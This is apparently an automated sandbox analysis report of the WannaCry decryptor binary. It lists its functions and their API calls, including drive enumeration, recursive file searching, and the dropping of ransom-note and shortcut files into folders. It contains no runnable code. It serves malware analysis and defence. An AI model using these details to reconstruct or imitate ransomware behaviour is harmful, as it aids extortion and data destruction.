    • OffsetRect.USER32(?,?,?), ref: 00409A9B
    • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
    • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
    • #5781.MFC42(0041679C,00000000), ref: 00409ACC
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004034A0, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404EB0, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406940, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404310, Relevance: 9.1, APIs: 6, Instructions: 51
    APIs
    • #470.MFC42(?,00000000), ref: 0040433F
    • #5789.MFC42 ref: 00404354
    • #5875.MFC42(00000001), ref: 00404361
    • #6172.MFC42(?,00000001), ref: 0040436E
    • #5789.MFC42(00000000), ref: 0040438F
    • #755.MFC42(00000000), ref: 004043A0
      • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
      • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
      • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
      • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
      • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
      • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
      • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00403EB0, Relevance: 9.0, APIs: 6, Instructions: 24
    APIs
    • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
    • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
    • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
    • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
    • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
    • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00403A20, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
    APIs
    • GetLogicalDrives.KERNEL32 ref: 00403A35
    • GetDriveTypeW.KERNEL32 ref: 00403A7A
    • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
      • Part of subcall function 004026B0: swprintf.MSVCRT ref: 00402728
      • Part of subcall function 004026B0: FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027E1
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027FB
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
      • Part of subcall function 004026B0: GetFileAttributesW.KERNEL32(?), ref: 00402830
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 0040286E
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028C3
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028DD
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028F3
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 00402914
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 004026B0: FindNextFileW.KERNEL32(?,?), ref: 0040296A
      • Part of subcall function 004026B0: FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402A6B
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402ABF
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406EF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
    APIs
    • #823.MFC42(?), ref: 00406F15
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
    • #825.MFC42(?), ref: 00406F62
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004030E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
    APIs
    • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404C40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
    APIs
    • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
    • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
    • #860.MFC42(00421798), ref: 00404CAD
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00408B40, Relevance: 7.6, APIs: 5, Instructions: 75
    APIs
    • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
    • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
    • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404530, Relevance: 7.6, APIs: 5, Instructions: 50
    APIs
    • #289.MFC42 ref: 0040455F
    • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
    • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
    • #613.MFC42 ref: 004045BB
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406CF0, Relevance: 7.5, APIs: 5, Instructions: 48
    APIs
    • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
    • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,0001DAA0), ref: 00406D39
    • SendMessageA.USER32 ref: 00406D69
    • #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
      • Part of subcall function 00406DC0: #823.MFC42(00000001,?,?), ref: 00406DEC
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E3E
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E5A
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
      • Part of subcall function 00406DC0: #6136.MFC42 ref: 00406EC4
      • Part of subcall function 00406DC0: #825.MFC42(?), ref: 00406ED7
    • #665.MFC42 ref: 00406D87
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407DB0, Relevance: 7.5, APIs: 5, Instructions: 42
    APIs
      • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
      • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
    • time.MSVCRT ref: 00407DEA
    • #2514.MFC42 ref: 00407E18
    • time.MSVCRT ref: 00407E2A
    • #765.MFC42 ref: 00407E49
    • #641.MFC42 ref: 00407E5D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004031A0, Relevance: 7.5, APIs: 5, Instructions: 40
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
    • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
    • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
    • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004047C0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154
    APIs
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
    • _local_unwind2.MSVCRT ref: 004048EB
    • strncmp.MSVCRT(00000000,?), ref: 00404951
    • _local_unwind2.MSVCRT ref: 00404964
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00403AF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132
    APIs
    • fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
    • fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00402650: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000167,00000167), ref: 00402688
    • fclose.MSVCRT ref: 00403C62
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040B6A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
    • DeleteFileA.KERNEL32(?), ref: 0040B6D9
    • sprintf.MSVCRT ref: 0040B74E
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
      • Part of subcall function 00412A00: #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
      • Part of subcall function 00412A00: #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040D300, Relevance: 6.2, APIs: 4, Instructions: 159
    APIs
      • Part of subcall function 00412A90: malloc.MSVCRT ref: 00412A95
      • Part of subcall function 0040D2B0: memmove.MSVCRT ref: 0040D2E1
    • time.MSVCRT ref: 0040D408
    • Sleep.KERNEL32(00000064), ref: 0040D46B
    • time.MSVCRT ref: 0040D487
    • free.MSVCRT(?), ref: 0040D4A9
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040D150, Relevance: 6.1, APIs: 4, Instructions: 122
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004108A0, Relevance: 6.1, APIs: 4, Instructions: 107
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004108FB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
    • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00412250, Relevance: 6.1, APIs: 4, Instructions: 100
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
    • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406A00, Relevance: 6.1, APIs: 4, Instructions: 70
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040D0A0, Relevance: 6.1, APIs: 4, Instructions: 64
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00405180, Relevance: 6.1, APIs: 4, Instructions: 51
    APIs
    • _mbscmp.MSVCRT ref: 00405191
    • #860.MFC42(?), ref: 004051A1
    • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00412A00, Relevance: 6.0, APIs: 4, Instructions: 45
    APIs
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
    • #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
    • #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040DAD0, Relevance: 6.0, APIs: 4, Instructions: 45
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404430, Relevance: 6.0, APIs: 4, Instructions: 44
    APIs
    • _TrackMouseEvent.COMCTL32(00000010), ref: 00404463
    • #2379.MFC42 ref: 0040446F
    • #2379.MFC42 ref: 004044AA
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    • SetCursor.USER32(?), ref: 004044A2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
